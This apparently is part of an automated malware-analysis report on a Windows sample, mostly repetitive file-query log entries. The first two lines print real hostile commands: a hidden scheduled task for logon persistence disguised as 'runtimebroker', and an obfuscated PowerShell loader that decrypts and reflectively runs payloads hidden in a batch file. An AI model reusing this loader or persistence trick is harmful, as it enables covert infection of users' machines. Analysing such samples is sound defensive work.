                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'runtimebroker_startup_533_str' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\startup_str_533.vbs') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -forceJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('zqhxkxfkvydhcognkrw5ypx3hzrh58mwnx9rrajxnma='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('y2k5eloh/96mwkcy8rovsg=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $gqtyr=new-object system.io.memorystream(,$param_var); $hyvqx=new-object system.io.memorystream; $qmylf=new-object system.io.compression.gzipstream($gqtyr, [io.compression.compressionmode]::decompress); $qmylf.copyto($hyvqx); $qmylf.dispose(); $gqtyr.dispose(); $hyvqx.dispose(); $hyvqx.toarray();}function execute_function($param_var,$param2_var){ $iwcxb=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $rubak=$iwcxb.entrypoint; $rubak.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 'c:\users\user\appdata\roaming\startup_str_533.bat';$aednq=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\roaming\startup_str_533.bat').split([environment]::newline);foreach ($ccaqv in $aednq) { if ($ccaqv.startswith(':: ')) { $drdpt=$ccaqv.substring(3); break; }}$payloads_var=[string[]]$drdpt.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
